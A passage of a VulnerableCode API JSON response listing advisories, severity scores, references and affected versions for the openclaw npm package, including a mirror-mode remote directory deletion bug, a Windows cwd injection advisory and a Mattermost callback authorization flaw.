nerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["GHSA-6rmx-gvvg-vh6j"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qyyn-bw9t-r7c4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89402?format=json","vulnerability_id":"VCID-r5bw-c2py-9udf","summary":"OpenClaw: OpenShell mirror mode could delete arbitrary remote directories when roots were mis-scoped\n## Summary\n\nBefore OpenClaw 2026.4.2, the OpenShell mirror backend accepted arbitrary absolute `remoteWorkspaceDir` and `remoteAgentWorkspaceDir` values. 
In mirror mode, those paths were then used as the target of remote cleanup and overwrite operations.\n\n## Impact\n\nIf an attacker could influence those OpenShell config values, mirror sync could delete the contents of an unintended remote directory and replace them with uploaded workspace data. This was a destructive remote-path bug in the mirror-sync path.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `b21c9840c2e38f4bb338d031511b479d5f07ca25` — constrain OpenShell mirror sync roots\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @jufeng123768 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41383","reference_id":"","reference_type":"","scores":[{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.1855","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18515","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18553","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41383"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/b21c9840c2e38f4bb338d031511b479d5f07ca25","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:49:59Z/"}],"url":"https://github.com/openclaw/openclaw/commit/b21c9840c2e38f4bb338d031511b479d5f07ca25"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m34q-h93w-vg5x","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:49:59Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m34q-h93w-vg5x"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41383","reference_id":"CVE-2026-41383","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41383"},{"reference_url":"https://github.com/advisories/GHSA-m34q-h93w-vg5x","reference_id":"GHSA-m34q-h93w-vg5x","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m34q-h93w-vg5x"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-remote-directory-deletion-via-mis-scoped-mirror-mode
-paths","reference_id":"openclaw-arbitrary-remote-directory-deletion-via-mis-scoped-mirror-mode-paths","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:49:59Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-remote-directory-deletion-via-mis-scoped-mirror-mode-paths"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vul
nerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"res
ource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-41383","GHSA-m34q-h93w-vg5x"],"risk_score":3.6,"exploitability":"0.5","weighted_severity":"7.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-r5bw-c2py-9udf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91847?format=json","vulnerability_id":"VCID-r5dj-qv5d-sqff","summary":"Duplicate Advisory: ACPX Windows wrapper shell fallback allowed cwd injection in specific paths\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-6f6j-wx9w-ff4j. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions 2026.2.26 prior to 2026.3.1 on Windows contain a current working directory injection vulnerability in wrapper resolution for .cmd/.bat files that allows attackers to influence execution behavior through cwd manipulation. Remote attackers can exploit improper shell execution fallback mechanisms to achieve command execution integrity loss by controlling the current working directory during wrapper 
resolution.","references":[{"reference_url":"https://www.vulncheck.com/advisories/openclaw-current-working-directory-injection-via-windows-wrapper-resolution-fallback","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-current-working-directory-injection-via-windows-wrapper-resolution-fallback"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31999","reference_id":"CVE-2026-31999","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31999"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6f6j-wx9w-ff4j","reference_id":"GHSA-6f6j-wx9w-ff4j","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.c
om/openclaw/openclaw/security/advisories/GHSA-6f6j-wx9w-ff4j"},{"reference_url":"https://github.com/advisories/GHSA-h36m-2vh5-x699","reference_id":"GHSA-h36m-2vh5-x699","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h36m-2vh5-x699"}],"fixed_packages":[],"aliases":["GHSA-h36m-2vh5-x699"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-r5dj-qv5d-sqff"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91808?format=json","vulnerability_id":"VCID-r9j7-ya3h-cbda","summary":"OpenClaw: Mattermost callback dispatch allowed non-allowlisted sender actions\n## Summary\nMattermost interactive callback dispatch could run action handlers before normal sender authorization checks completed.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/mattermost/src/mattermost/interactions.ts now requires callback authorization before dispatching actions.\n- extensions/mattermost/src/mattermost/monitor.ts routes callback authorization through the same sender and allowlist policy used for normal ingress.\n\nOpenClaw thanks @zpbrent for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35652","reference_id":"","reference_type":"","scores":[{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.19797","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.19749","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.19792","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35652"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:54:51Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scor
ing_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:54:51Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8883-9w57-vwv6","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:54:51Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8883-9w57-vwv6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35652","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35652"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthorized-action-execution-via-callback-dispatch","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:
N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:54:51Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthorized-action-execution-via-callback-dispatch"},{"reference_url":"https://github.com/advisories/GHSA-8883-9w57-vwv6","reference_id":"GHSA-8883-9w57-vwv6","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8883-9w57-vwv6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"}
,{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"}
,{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"}
